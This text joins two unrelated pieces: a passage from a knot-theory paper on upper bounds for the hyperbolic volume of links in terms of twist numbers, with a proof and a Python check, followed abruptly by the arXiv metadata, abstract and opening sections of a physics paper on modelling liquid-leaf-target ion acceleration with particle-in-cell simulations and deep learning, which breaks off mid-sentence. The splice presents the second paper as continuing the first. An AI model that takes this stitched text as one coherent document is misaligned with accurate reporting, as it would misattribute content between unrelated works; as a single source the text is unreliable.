For example, for the diagram \(D\) shown in Figure 5 we have \(t(D)=3\). In the appendix to Lackenby's paper [28], Agol and Thurston showed that the volume of any hyperbolic link \(K\) can be estimated in terms of the number of twists \(t(D)\) in its diagram \(D\) as follows: \[\operatorname{vol}\left(S^{3}\setminus K\right)\leq 10v_{tet}\cdot(t(D)-1). \tag{12}\] Moreover, this estimate is asymptotically sharp. By inequality (12) we get the bound \(\operatorname{vol}(S^{3}\setminus\mathbf{b}(\frac{55}{17}))\leq 20\cdot v_{ tet}=20.29882\). In [16] Dasbach and Tsvietkova used additional information on twists to improve the inequality obtained by Agol and Thurston. For the diagram \(D\) of the link \(K\) denote by \(t_{i}=t_{i}(D)\) the number of twists of length \(i\) for \(i\geq 1\). Note that \(t(D)=\sum_{i\geq 1}t_{i}(D)\). Denote by \(g_{i}=g_{i}(D)\) the number of twists of length at least \(i\), \(i\geq 1\). Figure 5. Diagram of the two-bridge knot \(\mathbf{b}(\frac{55}{17})\). Figure 6. Twist of length five in the diagram. According to [16, Theorem 2.3], if \(D\) is a reduced alternating diagram of a hyperbolic alternating link \(K\), then \[\operatorname{vol}(S^{3}\setminus K)\leq v_{tet}\cdot(4t_{1}+6t_{2}+8t_{3}+10g _{4}-a), \tag{13}\] where \(a=10\) if \(g_{4}\neq 0\), \(a=7\) if \(t_{3}\neq 0\), \(a=6\) otherwise. Later in [17] Dasbach and Tsvietkova proved that the bound (13) is also true in the case when the diagram is not alternating. Adams [4, Theorem 3.1] improved the result obtained by Dasbach and Tsvietkova as follows. Let \(K\) be a hyperbolic link admitting a reduced alternating diagram \(D\) with \(c(D)\geq 5\) and \(t(D)\geq 3\). Moreover, we assume that \(K\) is not the Borromean rings \(6^{3}_{2}\). Then \[\operatorname{vol}\left(S^{3}\setminus K\right)<t_{1}\cdot v_{oct}+t_{2}\cdot 6 v_{tet}+t_{3}\cdot 16\Lambda\left(\frac{\pi}{8}\right)+t_{4}\cdot 20\Lambda \left(\frac{\pi}{10}\right)+g_{5}\cdot 10v_{tet}-a, \tag{14}\] where \[a=\begin{cases}7v_{oct}-10v_{tet},&\text{if $g_{2}=0$},\\ 11v_{tet},&\text{if $g_{3}=0$ and $t_{2}\geq 1$},\\ 32\Lambda\left(\frac{\pi}{8}\right)+5v_{tet}-v_{oct}-14\Lambda\left(\frac{ \pi}{7}\right),&\text{if $g_{4}=0$ and $t_{3}\geq 1$},\\ 40\Lambda\left(\frac{\pi}{10}\right)+12\Lambda\left(\frac{\pi}{6}\right)-2v_{ tet}-8\Lambda\left(\frac{\pi}{4}\right)-18\Lambda\left(\frac{\pi}{9}\right),&\text{if $g_{5}=0$ and $t_{4}\geq 1$},\\ 4v_{tet}+12\Lambda\left(\frac{\pi}{6}\right)+60\Lambda\left(\frac{\pi}{10} \right)-54\Lambda\left(\frac{\pi}{9}\right),&\text{if $g_{5}\geq 1$}.\end{cases} \tag{15}\] Calculating the values of the Lobachevsky function specified in (14) and (15) with an accuracy of up to six digits, we get the inequality \[\operatorname{vol}\left(S^{3}\setminus K\right)<3.663863\cdot t_{1}+6.089646 \cdot t_{2}+7.854977\cdot t_{3}+9.237551\cdot t_{4}+10.149416\cdot g_{5}-a, \tag{16}\] where \(a\) takes the following values: \[a=\begin{cases}15.497263,&\text{if $g_{2}=0$},\\ 11.164351,&\text{if $g_{3}=0$ and $t_{2}\geq 1$},\\ 10.088228,&\text{if $g_{4}=0$ and $t_{3}\geq 1$},\\ 10.287338,&\text{if $g_{5}=0$ and $t_{4}\geq 1$},\\ 12.111063,&\text{if $g_{5}\geq 1$}.\end{cases} \tag{17}\] Note that the formulae (14)-(17) give the bound \(\operatorname{vol}(S^{3}\setminus\mathbf{b}(\frac{55}{17}))<16.0426\). The following bounds for the volume of an alternating knot in terms of the coefficients of its Jones polynomial were obtained by Dasbach and Lin [15]. Let \(K\) be a prime alternating knot that is not a torus knot. 
Let its Jones polynomial have the form \[V_{K}(t)=a_{n}t^{n}+a_{n+1}t^{n+1}+\ldots+a_{m-1}t^{m-1}+a_{m}t^{m}.\] Then \[v_{oct}\left(\max(|a_{m-1}|,|a_{n+1}|-1)\right)\leq\operatorname{vol}(S^{3}\setminus K) \leq 10v_{3}(|a_{n+1}|+|a_{m-1}|-1). \tag{18}\] According to [27], the Jones polynomial of \(\mathbf{b}(\frac{55}{17})\) is equal to \[V(t)=t^{3}-t^{4}+3t^{5}-5t^{6}+7t^{7}-8t^{8}+9t^{9}-8t^{10}+6t^{11}-4t^{12}+2t^{13}-t^{14}.\] Hence, the following bounds hold: \[2\cdot v_{oct}\leq\operatorname{vol}\left(S^{3}\setminus\mathbf{b}\left( \frac{55}{17}\right)\right)\leq 20\cdot v_{3}.\] For the volumes of two-bridge links, upper and lower bounds were obtained in [21]. If \(D\) is a reduced alternating diagram of a two-bridge link \(K\), then \[2v_{tet}\cdot t(D)-2.7066\leq\operatorname{vol}(S^{3}\setminus K)\leq 2v_{oct} \cdot(t(D)-1).\] These bounds were used in [32] to estimate the Matveev complexity of hyperbolic 3-manifolds represented as cyclic branched coverings of two-bridge knots and links. The proof of the upper bound is based on the fact that the full augmentation without half-turns (see the definition below) of a two-bridge link with \(t(D)\) twists is the belted sum of \(t(D)\) copies of the Borromean rings. Applying the last bound to \(\mathbf{b}(\frac{55}{17})\), we get: \[6\cdot v_{tet}-2.7066\leq\operatorname{vol}\left(S^{3}\setminus\mathbf{b} \left(\frac{55}{17}\right)\right)\leq 4\cdot v_{oct}.\] Now we return to arbitrary hyperbolic knots and links. In Theorem 5.1 we obtain an inequality that improves the bounds (12) and (14) in the cases when the number of twists in the diagram is large enough. **Theorem 5.1**.: _Let \(D\) be a diagram of a hyperbolic link \(K\) with \(t(D)\) twists. If \(t(D)>8\), then_ \[\operatorname{vol}\left(S^{3}\setminus K\right)\leq 10v_{tet}\cdot(t(D)-1.4). \tag{19}\] Figure 7. Conway’s normal forms for 2-bridge links and knots. Proof.: Starting from a diagram of \(K\) we will construct a link \(L\) such that \(\operatorname{vol}(S^{3}\setminus K)<\operatorname{vol}(S^{3}\setminus L)\) and bound the volume of the manifold \(S^{3}\setminus L\) by splitting it into two ideal right-angled polyhedra. Step 1. Let \(D\) be a diagram of a link \(K\) with \(t=t(D)\) twists. Denote the lengths of the twists by \(n_{1},n_{2},\ldots,n_{t}\). Similarly to [28] and [33, Chapter 7], we construct a new link from the diagram \(D\) as follows. If \(|n_{i}|\geq 2\), then we replace the maximum possible number of full turns \(\lfloor\frac{|n_{i}|}{2}\rfloor\) in the \(i\)-th twist, \(i=1,\ldots,t\), with a new link component that covers this twist. If \(|n_{i}|=1\), then we just add a new link component that covers the twist. The resulting link \(J\) is called the _full augmentation_ of the link \(K\) (see, for example, [33]). Thus, \(J\) has \(t(D)\) more components than the original link \(K\). The new components in \(J\) will be further referred to as _vertical_. Note that the initial link \(K\) can be obtained by Dehn surgeries on the vertical components of \(J\). For example, the diagram of the knot \(\mathbf{b}(\frac{55}{17})\) shown in Figure 5 has twists of lengths \(3\), \(4\) and \(4\). The corresponding link \(J_{4}\) has \(4\) components and is shown in Figure 8. Three of the four components of the link \(J_{4}\) are vertical, and surgeries on these components give the knot \(\mathbf{b}(\frac{55}{17})\). Hence, \(\operatorname{vol}(S^{3}\setminus\mathbf{b}(\frac{55}{17}))<\operatorname{vol }(S^{3}\setminus J_{4})\). Step 2. 
If a twist in \(D\) had an odd length, then one half-turn will remain from it in the diagram of the link \(J\). Let us change the link \(J\) to a link \(L\) which does not have such half-turns. To do this, we apply the _Adams transformation_, shown in Figure 9, the required number of times. The resulting link \(L\) is called the _full augmentation without half-turns_ of the link \(K\) (see, for example, the terminology from [26]). As shown by Adams [2, Corollary 5.1], the application of this transformation preserves hyperbolicity of the link and does not change the volume, hence \(\operatorname{vol}(S^{3}\setminus J)=\operatorname{vol}(S^{3}\setminus L)\). Note that the links \(J\) and \(L\) have the same number of vertical components and \(L\) has no half-turns in its diagram. Figure 8. Four-component link \(J_{4}\). Figure 9. Adams transformation. For example, the link obtained by the Adams transformation from the link \(J_{4}\) is shown in Figure 10; it has 5 components, three of which are vertical. Step 3. Applying the method from [28], we decompose \(S^{3}\setminus L\) into the union of two copies of an ideal right-angled hyperbolic polyhedron. Firstly, we replace each vertical component of the link \(L\) with a pair of triangles with a common vertex, as shown in Figure 11 for the link \(L_{5}\). In this case, the edges corresponding to the triangles will be called red, and the edges connecting the triangles will be called black. Secondly, we contract each black edge into a point and denote the resulting polyhedron by \(P\). Since each black edge was incident to two trivalent vertices, after the black edges are contracted, new quadrivalent vertices will appear. We will call them _black_. As a result, all vertices of the polyhedron \(P\) are quadrivalent; moreover, \(t(D)\) of them are red and \(2t(D)\) are black. Thus, \(P\) has \(V=3t(D)\) vertices and at least \(2t(D)\) triangular faces, which, with a two-color chessboard coloring of the faces of the polyhedron, will turn out to be colored in the same color. As noted in [28], the polyhedron \(P\) is an ideal right-angled polyhedron and \(\operatorname{vol}(S^{3}\setminus L)=2\operatorname{vol}(P)\). The polyhedron \(P_{5}\) corresponding to the diagram of the link \(L_{5}\) is shown in Figure 12. As in the proof of Lemma 3.1, let us consider the union \(DP\) of the bipyramids obtained by doubling the pyramids with a common apex \(v\) splitting \(P\). The volume of \(DP\) is twice the volume of \(P\) and therefore coincides with \(\operatorname{vol}(S^{3}\setminus L)\). For \(n\geq 4\) each \(n\)-bipyramid is a union of \(n\) ideal tetrahedra. Each triangular bipyramid corresponding to one of the \(2t(D)\) triangular faces of the same color will be divided into two tetrahedra. The remaining triangular bipyramids will be regarded as divided into 3 tetrahedra. Figure 10. Five-component link \(L_{5}\). Figure 11. Replacing vertical components of the link \(L_{5}\) with pairs of triangles. Since the number of vertices \(V=3t(D)>24\), the apex \(v\) can be chosen (see the proof of item (b) of Lemma 3.3) so that the sum of the sizes of the four faces adjacent to \(v\) is at least \(16\). We get the estimate \[\operatorname{vol}(DP)\leqslant 4v_{tet}\cdot\left(V-\frac{2t(D)+k}{4}\right),\] where \(k\) is the number of tetrahedra corresponding to degenerate bipyramids. Let us estimate the value of \(k\). 
The vertex \(v\) is adjacent to two triangles that are colored in the same color in the two-color chessboard coloring of the faces of the polyhedron \(P\). The two bipyramids that have these triangles as bases correspond to \(4\) degenerate tetrahedra. The other two faces adjacent to \(v\) can be of any size, but their total number of sides is not less than \(10\). So the two bipyramids that have these faces as bases correspond to at least \(10\) degenerate tetrahedra. Hence we get that \(k\geq 4+10=14\), and therefore \[\operatorname{vol}\left(S^{3}\setminus K\right)<\operatorname{vol}\left(S^{3} \setminus L\right)=\operatorname{vol}(DP)\leqslant 4v_{tet}\cdot\left(3t(D)- \frac{2t(D)+14}{4}\right),\] which completes the proof of the theorem. **Remark 5.2**.: The paper [16] gives a bound that takes into account the number of triangles \(\Delta\) of the polyhedron \(P\) constructed from the link \(K\): \[\operatorname{vol}(S^{3}\setminus K)\leq v_{tet}\cdot(4t_{1}+6t_{2}+8t_{3}+10g_{4}-a-\Delta).\] One can refine the formula (19) in a similar way. Indeed, if the polyhedron \(P\) constructed from the link \(K\) has \(\Delta+2t(D)\) triangles, then \[\operatorname{vol}\left(S^{3}\setminus K\right)\leq 10v_{tet}\cdot\left(t(D)-1.3-\frac{\Delta}{10}\right). \tag{20}\] **Remark 5.3**.: If a link \(K\) has a diagram \(D\) with \(t(D)>8\) twists, then the bound (20) improves the bound (12). **Remark 5.4**.: Assume that a link \(K\) has a reduced alternating diagram \(D\) such that \(t(D)>8\) and all twists have length at least \(5\), that is, \(t_{1}=t_{2}=t_{3}=t_{4}=0\). Then the bound (19) improves the bound (14). In fact, comparing these estimates, we get \[10v_{tet}(t(D)-1.4)<10v_{tet}\,t(D)-12.111063,\] since \(14v_{tet}=14.209174>12.111063\). Figure 12. Polyhedron \(P_{5}\) for the link \(L_{5}\). Note that apart from the upper bounds for the volumes of hyperbolic links in terms of the number of twists, there are few lower bounds. As an example, let us consider the bound obtained in [20]. Suppose the link \(K\) has a simple reduced alternating diagram \(D\) such that \(t(D)\geq 2\) and all twists have length at least \(7\), that is, \(t_{1}=t_{2}=t_{3}=t_{4}=t_{5}=t_{6}=0\). Then \[0.70735\cdot(t(D)-1)<\operatorname{vol}{(S^{3}\setminus K)}. \tag{21}\] **Remark 5.5**.: The bound from Theorem 5.1 can be refined if there is information about which faces, other than the \(2t(D)\) triangular ones, are present in the polyhedron \(P\) constructed from the diagram \(D\). Recall that in the two-color chessboard coloring, the \(2t(D)\) triangles have one color, which we call _dark_, and the other polygons have the other color, which we call _white_. Denote by \(f_{n}\), \(n\geq 3\), the number of white \(n\)-gons in \(P\). For example, for the polyhedron \(P\) shown in Figure 12, we have \(f_{3}=3\), \(f_{4}=2\), \(f_{n}=0\), \(n\geq 5\). **Corollary 5.6**.: _Let \(D\) be the diagram of the hyperbolic link \(K\). Let \(f_{n}\) be the number of white \(n\)-gonal faces in the ideal right-angled polyhedron \(P\) constructed from a full augmentation without half-turns of the link \(K\). Then_ \[\operatorname{vol}(S^{3}\setminus K)\leq(4t(D)-8)v_{tet}+2\sum_{n\geq 3}nf_{n} \Lambda\left(\frac{\pi}{n}\right).\] Proof.: As in the proof of Lemma 3.1, we use the fact that the volume of an ideal \(n\)-gonal bipyramid is at most \(2n\Lambda\left(\frac{\pi}{n}\right)\).
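As a quick numerical sanity check (a sketch in Python with SciPy; the choice of tooling is ours), one can evaluate the bound of Corollary 5.6 for the example above, where \(t(D)=3\), \(f_{3}=3\) and \(f_{4}=2\) for the polyhedron \(P_{5}\), and compare it with the SnapPy value \(\operatorname{vol}(S^{3}\setminus\mathbf{b}(\frac{55}{17}))=10.117141\).

```python
import numpy as np
from scipy.integrate import quad

def lobachevsky(theta):
    # Lambda(theta) = -integral_0^theta ln|2 sin t| dt
    val, _ = quad(lambda t: -np.log(np.abs(2.0 * np.sin(t))), 0.0, theta)
    return val

v_tet = 3 * lobachevsky(np.pi / 3)

def corollary_5_6_bound(t, f):
    """Bound of Corollary 5.6: (4 t(D) - 8) v_tet + 2 * sum_n n * f_n * Lambda(pi/n).

    `f` maps n to the number of white n-gonal faces of the polyhedron P.
    """
    return (4 * t - 8) * v_tet + 2 * sum(n * fn * lobachevsky(np.pi / n)
                                         for n, fn in f.items())

# P_5 has f_3 = 3 white triangles and f_4 = 2 white quadrilaterals (Remark 5.5).
bound = corollary_5_6_bound(t=3, f={3: 3, 4: 2})
print(bound)   # ~17.48, consistent with vol(S^3 \ b(55/17)) = 10.117141 < bound
```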
2306.13316
Modeling of a Liquid Leaf Target TNSA Experiment using Particle-In-Cell Simulations and Deep Learning
Liquid leaf targets show promise as high repetition rate targets for laser-based ion acceleration using the Target Normal Sheath Acceleration (TNSA) mechanism and are currently under development. In this work, we discuss the effects of different ion species and investigate how they can be leveraged for use as a possible laser-driven neutron source. To aid in this research, we develop a surrogate model for liquid leaf target laser-ion acceleration experiments, based on artificial neural networks. The model is trained using data from Particle-In-Cell (PIC) simulations. The fast inference speed of our deep learning model allows us to optimize experimental parameters for maximum ion energy and laser-energy conversion efficiency. An analysis of parameter influence on our model output, using Sobol and PAWN indices, provides deeper insights into the laser-plasma system.
Benedikt Schmitz, Daniel Kreuter, Oliver Boine-Frankenheim
2023-06-23T06:39:43Z
http://arxiv.org/abs/2306.13316v1
Modeling of a Liquid Leaf Target TNSA Experiment using Particle-In-Cell Simulations and Deep Learning ###### Abstract Liquid leaf targets show promise as high repetition rate targets for laser-based ion acceleration using the Target Normal Sheath Acceleration (TNSA) mechanism and are currently under development. In this work, we discuss the effects of different ion species and investigate how they can be leveraged for use as a possible laser-driven neutron source. To aid in this research, we develop a surrogate model for liquid leaf target laser-ion acceleration experiments, based on artificial neural networks. The model is trained using data from Particle-In-Cell (PIC) simulations. The fast inference speed of our deep learning model allows us to optimize experimental parameters for maximum ion energy and laser-energy conversion efficiency. An analysis of parameter influence on our model output, using Sobol' and PAWN indices, provides deeper insights into the laser-plasma system. TNSA, Deep Learning, PIC, Liquid Leaf, Lorentz Boost, Multi-Species, Numerical Optimization ## I Introduction Laser-accelerated ions have great potential for various applications, such as compact medical accelerators [1; 2; 3; 4], neutron sources [5; 6; 7; 1; 5] or as injectors for conventional accelerators [8]. These applications require a high repetition rate to overcome the drawback of the exponential energy distribution, typical for Target Normal Sheath Acceleration. However, conventional solid-state targets cannot achieve high repetition rates due to engineering difficulties and target supply [9] (Chapter 4.2). For this reason, different targets such as gas [10] or liquid-based targets [11; 12] are currently being developed. In this work, we investigate a liquid leaf target [13] currently under development at TU Darmstadt. This target is a major step towards achieving reproducible, high repetition rate ion bunches from laser-plasma interactions, which is necessary for any kind of application. This new system allows for the operation of a repetitive target with arbitrary H\({}_{2}\)O/D\({}_{2}\)O ratios for the first time, which we investigate in this work. In particular, we aim to train a surrogate model for a liquid leaf target in a target normal sheath acceleration (TNSA) experiment to understand the characteristics of the liquid leaf and its composition, predict ideal operating points and understand how multiple ion species interact with each other. The first aim for the target at TU Darmstadt is the creation of a viable compact neutron source, which requires proton energies larger than the production threshold of neutrons (\(>1.7\,\mathrm{MeV}\)) [6]. Previous attempts at modeling laser-plasma acceleration experiments have been made [14; 15; 16; 17]. With our contributions, presented in this work, we expand on the state-of-the-art by taking more parameters of the experimental setup into account and providing a surrogate for the theory of intricate effects a multi-species target can have on the energy spectrum of the accelerated ions. Huebl et al. [10] have found a strong influence of the mixture ratio of multiple species on the resulting energy spectra in hydrogen-deuterium targets. In section II.1, we expand on their idea and provide indicators for the importance of this effect. Furthermore, while attempts at modeling a laser-plasma acceleration experiment using neural networks have been made [14], we extend previous work with a vast number of Particle-In-Cell simulations to train our models. 
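Before examining the spectra in more detail, the following minimal sketch (in Python; the paper itself reports no code, so the language and values are our assumptions based on standard atomic data) makes the species ordering implied by Eq. (1) concrete and shows the \(q_{i}/m_{i}\) degeneracy of deuterium and fully ionized oxygen discussed below.

```python
# Charge states in units of e, masses in atomic mass units (approximate).
species = {
    "H+":  (1, 1.007),
    "D+":  (1, 2.014),
    "O7+": (7, 15.999),
    "O8+": (8, 15.999),
}

# Rank by q^2/m, the quantity that controls energy gain in a fixed field (Eq. (1)).
for name, (q, m) in sorted(species.items(),
                           key=lambda kv: kv[1][0] ** 2 / kv[1][1],
                           reverse=True):
    print(f"{name:4s}  q/m = {q / m:.3f} e/u   q^2/m = {q * q / m:.3f} e^2/u")

# D+ and O8+ share (almost exactly) the same q/m, so their sheath dynamics are
# degenerate, while the q^2/m ranking indicates which species depletes more of
# the available field energy.
```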
The chosen approach via deep learning also ensures that expansion (transfer learning) of the model with experimental data is possible. We demonstrate our surrogate model's high performance and utility by optimizing an example laser-plasma acceleration experiment, leveraging non-trivial relationships between the experimental parameters not yet understood by theory (see section III). ## II Plasma target models The following section details our contributions related to the considered multi-species target experiment as well as the creation of our simulation datasets and the training of our surrogate model. For this work, we carried out various PIC simulations to generate our datasets. The bulk of the simulations was computed on the _Virgo_ High-Performance Computing cluster[18] at GSI Helmholtzzentrum, Darmstadt. For these simulations, we used the _Smilei[19]_ PIC code. We determined the resulting surrogate by training an artificial neural network from the simulated data. ### Multi-species target considerations We are considering a liquid leaf target which consists of multiple different atom species. These ion species differ in their charge-to-mass ratio \(q_{i}/m_{i}\). and an ion can have up to \(Z\) different charge states. Taking water, for example, one can have up to 8 ionization states of oxygen and an additional one for the hydrogen component. Water occurs naturally with different isotopes of hydrogen. Taking into account regular water (H\({}_{2}\)O) and heavy water (D\({}_{2}\)O), an additional degree of freedom--the mixtures between the two--must be considered. Since several ion species are present, this can be denoted as a \(n\)-species plasma, where \(n\) is the number of ion states in the plasma. The final non-relativistic kinetic energy of species \(i\) accelerated in a constant electric field \(E_{0}\) scales as \[E_{\rm kin}\propto E_{0}^{2}\frac{q_{i}^{2}}{m_{i}}. \tag{1}\] Therefore, species with a higher \(q_{i}^{2}/m_{i}\) ratio will gain more energy. Provided that the initial densities are similar, species with higher \(q_{i}^{2}/m_{i}\) will deplete most of the available field energy. This energy is then split between different particle species and limits the acceleration efficiency of a single species. Several species interact with each other, leading to a deformation of the particle spectrum. Faster particles take electrons from the sheath and screen the acceleration field for the following heavier particles. These heavier particles are then accelerated in the screened field and hence have less kinetic energy per nucleon and a lower velocity than expected from the assumption above. Mid-energy lighter particles are accelerated by the following heavier particle front due to the Coulomb force, getting compressed in the momentum space. This compression causes plateaus and quasi-monoenergetic features to form. This effect is described in detail and analytically calculated for the asymptotic case for two particle species (deuterium and hydrogen gas) by Huebl et al.[10]. We applied their solutions for 2 species, since we assumed a fully ionized plasma in our simulations to reduce the degrees of freedom inside the plasma. The compression effect on the lighter particle spectrum is visualized in Figure 1 using a PIC simulation for regular H\({}_{2}\)O. Deviations from the ideal Mora[10; 20] can be seen. 
We can make two observations: Firstly, the lower energy part of the spectrum, in this case until half of the maximum energy, is coarser than the corresponding higher energy part of the spectrum. There is also a peak at around \(10\,\mathrm{MeV}\) in both spectra which makes it possible to compare the spectra against each other. These peaks are shifted by the same amount as the oxygen cutoff is shifted from the hydrogen plateau, which can be assumed to be a correlation due to the particle interaction in this energy range. Secondly, there is a plateau in the hydrogen spectrum starting at around \(30\,\mathrm{MeV}\). This plateau and the corresponding dip before it deviate fairly strongly from the established Mora theory for TNSA (indicated by the dotted lines). This drop/increase combination is explainable by the previously introduced multi-species effect and we want to investigate, predict, and leverage this behavior. If we can describe and predict this effect, we can optimize our ion beam for specific applications. To do this, we need to find a surrogate model for the full spectrum problem. Further insights gained from considering multiple species become evident in section II.2.6. Fully ionized oxygen has the same \(q_{i}/m_{i}\) ratio as deuterium, for example, which reduces the efficiency of deuterium acceleration. In this work, we only modeled the proton part of the spectrum because our data is ambiguous for the Oxygen/Deuterium combination part. However, expanding the dataset to include a sweep of the oxygen's charge number would resolve this ambiguity and yield clearer modeling results for deuterium. Figure 1: Particle energy spectra of hydrogen and oxygen after TNSA PIC simulation of liquid leaf water target. The dotted lines are the corresponding Mora[20] fits for the displayed spectrum. Large deviations from the spectrum (\(30\,\mathrm{MeV}\) and up) can be explained by the multi-species effect. The simulation setup is described in section II.2. The investigated features are sharp and their shape varies. One dimensional simulations have a sharper profile, while higher dimensional ones and real-life experiments are smoother[10; 21]. ### Particle-In-Cell Simulations Setup The simulations reflect a real experiment in reduced dimensions. To sample a larger parameter space in a reasonable time, we reduced the dimensions of the simulation to 1.5D. This means simulating one space and three momentum components. The fields are also sampled in three dimensions. We further applied an additional method to account for angle dependency by applying a transverse Lorentz boost to the system. Details on both the Lorentz boost and the method itself can be found in Appendix C. A sketch of the full setup is displayed in Figure 2. #### ii.2.1 Plasma target The target in the conducted simulations models a liquid leaf target under development at TU Darmstadt Institute of Nuclear Physics and which is similar to the work by George et al. [13]. The liquid leaf target's width is some cm, while the typical irradiation size of a laser is in the order of \(\mathrm{\SIUnitSymbolMicro m}\). We assume, that the surface roughness is negligible and the plasma surface is therefore considered to be planar. When the target is only dependent on one coordinate, it can be described fully by its particle density profile. Thus, the simulation only allows movement along the \(x\) coordinate and is independent of \(y\) and \(z\). 
We also assume that the plasma is expanded when the main pulse hits the target, and that the pre-plasma and skirt follow an exponential profile. We chose the scale length for the exponential profile as \(0.4\,\mathrm{\SIUnitSymbolMicro m}\) so as to be longer than a comparable setup with a cryogenic (i.e. less evaporative) jet target [22] while still ensuring a well-defined plasma border. The exponential profile thus takes the shape \[n_{\mathrm{exp}}(x)=\frac{n_{0}}{1+\exp(-(x-x_{\mathrm{front}})/l_{\mathrm{s} })} \tag{2}\] where \(l_{\mathrm{s}}=$0.4\,\mathrm{\SIUnitSymbolMicro m}$\) and \(x_{\mathrm{front}}\) is the location of the target front. The skirt has identical functional shape for the backside of the target. Since a liquid leaf target evaporates, we superimposed the typical vapor density distribution for a liquid leaf target, given by \[n_{\mathrm{LLT}}(r)\approx n\left(r_{\mathrm{jet}}\right)\left(\frac{r_{ \mathrm{jet}}}{r}\right)^{2}\frac{L_{\mathrm{L}}}{\sqrt{r^{2}+L_{\mathrm{L}} ^{2}}}\;, \tag{3}\] where \(n\left(r_{\mathrm{jet}}\right)\) is the water vapor density at the liquid jet surface, \(L_{\mathrm{L}}\approx$3\,\mathrm{cm}$\) is the liquid jet length, and \(r_{\mathrm{jet}}\) is the liquid jet radius [23]. Note that the second term in the above expression has been squared as we expect a faster drop-off of the liquid leaf density in our proposed experimental setup. The assumed particle densities are \(n_{0}=$6.68\times 10^{28}\,\mathrm{m}^{-3}$\) and \(n\left(r_{\mathrm{jet}}\right)=$1.62\times 10^{23}\,\mathrm{m}^{-3}$\) stemming from the liquid density of water and the density estimated at the saturation vapor pressure at \(0\,\mathrm{\SIUnitSymbolCelsius}\)[23]. We also introduced a cut-off of the profile \(4\,\mathrm{\SIUnitSymbolMicro m}\) before and after the target, which washes out by approximately \(1.4\,\mathrm{\SIUnitSymbolMicro m}\) by the time the laser hits the target. This cut-off is only introduced to optimize the simulation's performance. We chose to investigate multi-species effects resulting from a combination of different ion species inside the target. We simulated regular water, heavy water, and a potential mixture between the two. This mixture is indicated by the mixture parameter listed in Table 1, which we varied in discrete steps. The simulation thus consists of up to four species: electrons (\(\mathrm{e}^{-}\)), hydrogen (\(\mathrm{H}^{+}\)), deuterium (\(\mathrm{D}^{+}\)), and oxygen (\(\mathrm{O}^{n+}\)). As the ionization of oxygen is of importance to the model, this was varied as well. All particle species follow the same distribution function defined above. The ion species are initialized cold while the electrons received an initial temperature of \(30\,\mathrm{keV}\) to simulate interaction with a pre-pulse. We used Smilei's defaults for particle initialization, including no ionization or radiation model [24]. The length of one cell is the Debye length at the initial electron temperature, around \(5\,\mathrm{nm}\). For the time resolution, a CFL number of \(0.98\) was used. The interpolation order of the particle shape functions is set to four and the particle per cell count for each species is \(800\). #### ii.2.2 Laserpulse In a 1.5D simulation, the laser pulse is given by its time profile only. We assumed a Gaussian time profile, Figure 2: Overview of the simulation setup. Green marks the plasma target. The lighter green areas indicate the pre-plasma and the skirt implemented. 
The laser, indicated by the red arrow, hits the plasma under an angle \(\Theta\) – relative to the target normal. After the acceleration time, the momenta of the accelerated particles, given in blue, are registered. For the liquid leaf target, \(d_{1}\) is assumed to be equal to \(d_{3}\). using Smilei's tgaussian profile with the following shape: \[I_{\text{envelope}}(t)=\begin{cases}\exp\left(\frac{-(t-\tau_{\text{L}})^{2}}{( \tau_{\text{L}}/2)^{2}/\ln(2)}\right)&\text{if $t\leq 2\tau_{\text{L}}$}\\ 0&\text{otherwise}\end{cases}\;, \tag{4}\] where \(\tau_{\text{L}}\) is the main laser pulse duration. In this work, we deal with lasers that have a pulse duration \(\tau_{\text{L}}<1\,\text{ps}\) and an \(a_{0}>1\). The laser energy \(E_{\text{L}}\), pulse length \(\tau_{\text{L}}\), polarization, incident angle \(\theta_{\text{L}}\), wavelength \(\lambda_{\text{L}}\) and the target thickness \(d_{\text{T}}\) are variable and are uniformly sampled from the defined intervals in Table 1. Our thought process in choosing exactly these parameters was that we needed to cover the full system, which required the use of 9 parameters. These parameters were chosen based on two different, sometimes contradictory paradigms: one was to allow the similarity equations to take full effect, while the other was to enable experimental validation of the model (see also Appendix A and Appendix B) #### ii.1.3 Simulation Output Quantities The diagnostics recorded are the particles' \(x\)-coordinate, all components of the momentum \(\vec{p}\), and the macro-particle weight \(w\) at the acceleration time \[t_{\text{acc}}=\tau_{\text{L}}+d_{\text{T}}/c_{\text{s}}\;, \tag{5}\] where \(c_{\text{s}}\) is the ion-acoustic velocity. Lecz Lecz (1993) has found that this is a suitable acceleration time after which an isothermal plasma expansion model no longer holds. From these recorded values we reconstruct the energy spectrum of the particles in the lab frame by using Eq. (13). Since all energy spectra have an individual shape and cut-off energy, the spectra were each normalized to the energy range \([0,1]\), counted into 100 bins, and stored as a list together with their respective cut-off energies. In order to keep the numbers more practical, we took the logarithm. An entry for the results of a simulation thus has the following shape: \(\left\{\ln\left(\frac{\text{d}n}{\text{d}E}\right)_{\text{Bin }1},\ldots,\ln\left(\frac{\text{d}n}{\text{d}E}\right)_{\text{Bin }100},E_{\text{max}}\right\}\). Exponentiating and re-scaling by \(E_{\text{max}}\) restores the original energy spectrum accordingly. This same recording scheme is used for all four species for all simulations. We chose that the parameters in Table 1 are uniformly sampled with exception of the laser energy \(E_{\text{L}}\) which we sampled following a square root scale and the mixture was varied in discrete steps. This type of sampling results in significantly more simulations with low \(a_{0}\) than with high \(a_{0}\). To deal with this we forced additional simulations onto dedicated intervals of \(a_{0}\). Although the laser focus-FWHM is technically not relevant in the 1D case we sampled it nonetheless such that together with the sampled laser energy and pulse length the correct \(a_{0}\) was written in the input file. This also ensures comparability with higher-order simulations and experimental data. #### ii.1.4 Simulation statistics We used the setup described above to create a dataset of simulations for our subsequent surrogate model. 
All parameters were stochastically sampled and their combination can be thought of as a sparse grid. The Virgo cluster employs the Simple Linux Utility for Resource Management (SLURM) Klimner (2008) to schedule incoming jobs where up to \(10\,000\) jobs can be added to the queue simultaneously. The jobs were queued using a script to sample a certain number of parameter combinations and then start a simulation job for each of them. The number of simulations varies between the different species. There were 508 200 simulations for hydrogen and 762 426 simulations for deuterium, resulting in a total of \(1\,270\,626\) simulations. However, the precise number of simulations is not crucial, as long as the number of simulations is in a similar order of magnitude, the results should be comparable. The reduced model, which utilizes only the pure H\({}_{2}\)O data without D\({}_{2}\)O component was trained on a subset of the full dataset with 68 973 entries accordingly. #### ii.1.5 Limitations of 1.5D PIC We used 1.5D simulations as mentioned earlier. These low-dimensional simulations do have some drawbacks. While they, together with our introduced transversal Lorentz boost method (Appendix C), are capable of describing several effects, some are not possible. The main limitation is created by the expansion of the plasma behind the target. In one spatial dimension, no transversal drift of the particles is possible, therefore also no decay of space charge effects exists. The expansion continues until infinity if it is not stopped. Even though we introduced an effective acceleration time \(t_{\text{acc}}\), this problem persists. Since we keep both setup and method constant, the 